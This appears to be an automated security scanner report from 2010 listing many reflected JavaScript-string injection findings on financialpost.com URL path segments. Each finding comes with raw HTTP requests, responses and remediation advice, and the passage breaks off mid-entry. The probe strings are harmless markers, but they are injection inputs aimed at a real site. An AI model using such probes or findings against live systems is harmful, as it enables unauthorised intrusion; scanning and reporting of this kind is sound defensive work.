<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers1639b';9b5d88f64ad/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers1639b';9b5d88f64ad;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=15492710?"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da20f'%3bafe2f9b541b was submitted in the REST URL parameter 3. This input was echoed as da20f';afe2f9b541b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /careers/writing+workers+with+children/3943108da20f'%3bafe2f9b541b/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70161
Expires: Sun, 19 Dec 2010 03:15:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:44 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers/writing-workers-with-children/3943108da20f';afe2f9b541b/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers;kw=writing-workers-with-children;kw=3943108da20f';afe2f9b541b;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=17 ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf1b5'%3bbd8a9e4eb8e was submitted in the REST URL parameter 4. This input was echoed as cf1b5';bd8a9e4eb8e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /careers/writing+workers+with+children/3943108/cf1b5'%3bbd8a9e4eb8e HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:15:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37340
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f2aa'%3b1645e3d562a was submitted in the REST URL parameter 1. This input was echoed as 2f2aa';1645e3d562a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /css2f2aa'%3b1645e3d562a/print.css HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 03:03:12 GMT
Date: Sun, 19 Dec 2010 03:03:12 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 42946
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 680dd'%3b2c367558245 was submitted in the REST URL parameter 2. This input was echoed as 680dd';2c367558245 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /css/680dd'%3b2c367558245 HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:03:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:03:17 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 42979
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3389'%3bbf445645e7b was submitted in the REST URL parameter 1. This input was echoed as c3389';bf445645e7b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cssc3389'%3bbf445645e7b/story_widget.min.css HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 02:58:08 GMT
Date: Sun, 19 Dec 2010 02:58:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43144
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bee00'%3b7dd73a18789 was submitted in the REST URL parameter 2. This input was echoed as bee00';7dd73a18789 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /css/bee00'%3b7dd73a18789 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:58:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43068
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ec90'%3bc33f3436c73 was submitted in the REST URL parameter 1. This input was echoed as 7ec90';c33f3436c73 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneur7ec90'%3bc33f3436c73/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:13:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44045
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c621'%3b702d19f034f was submitted in the REST URL parameter 1. This input was echoed as 9c621';702d19f034f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneur9c621'%3b702d19f034f/Hidden+angels+Magnet+aspiring+startups/3967315/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 83762
Expires: Sun, 19 Dec 2010 03:14:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:21 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur9c621';702d19f034f/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur9c621';702d19f034f;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=70166368?"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba98e'%3bb4d3a3bee90 was submitted in the REST URL parameter 3. This input was echoed as ba98e';b4d3a3bee90 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneur/Hidden+angels+Magnet+aspiring+startups/3967315ba98e'%3bb4d3a3bee90/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 47894
Expires: Sun, 19 Dec 2010 03:14:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:39 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur/hidden-angels-magnet-aspiring-startups/3967315ba98e';b4d3a3bee90/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur;kw=hidden-angels-magnet-aspiring-startups;kw=3967315ba98e';b4d3a3bee90;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surro ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9386'%3bab3ee5a69d was submitted in the REST URL parameter 4. This input was echoed as a9386';ab3ee5a69d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneur/Hidden+angels+Magnet+aspiring+startups/3967315/a9386'%3bab3ee5a69d HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:14:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37683
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba574'%3b9b0c1337c4a was submitted in the REST URL parameter 1. This input was echoed as ba574';9b0c1337c4a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneurba574'%3b9b0c1337c4a/Partners+leverage+gift+card+idea/3931988/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 82924
Expires: Sun, 19 Dec 2010 03:14:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:32 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneurba574';9b0c1337c4a/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneurba574';9b0c1337c4a;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=36654678?"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 547fc'%3b614300144fa was submitted in the REST URL parameter 3. This input was echoed as 547fc';614300144fa in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneur/Partners+leverage+gift+card+idea/3931988547fc'%3b614300144fa/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 54486
Expires: Sun, 19 Dec 2010 03:14:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:48 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur/partners-leverage-gift-card-idea/3931988547fc';614300144fa/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur;kw=partners-leverage-gift-card-idea;kw=3931988547fc';614300144fa;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38251'%3b14ab344cd5d was submitted in the REST URL parameter 4. This input was echoed as 38251';14ab344cd5d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneur/Partners+leverage+gift+card+idea/3931988/38251'%3b14ab344cd5d HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:15:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37570
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2289'%3bea2284d08bf was submitted in the REST URL parameter 1. This input was echoed as b2289';ea2284d08bf in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneurb2289'%3bea2284d08bf/Social+media+gives+medium+life/3931982/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 78583
Expires: Sun, 19 Dec 2010 03:14:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:35 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneurb2289';ea2284d08bf/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneurb2289';ea2284d08bf;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=25921326?"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 314a3'%3b231830f9dd8 was submitted in the REST URL parameter 3. This input was echoed as 314a3';231830f9dd8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entrepreneur/Social+media+gives+medium+life/3931982314a3'%3b231830f9dd8/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 54415
Expires: Sun, 19 Dec 2010 03:14:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur/social-media-gives-medium-life/3931982314a3';231830f9dd8/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur;kw=social-media-gives-medium-life;kw=3931982314a3';231830f9dd8;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'
...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload afc98'%3ba15a08852bc was submitted in the REST URL parameter 4. This input was echoed as afc98';a15a08852bc in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
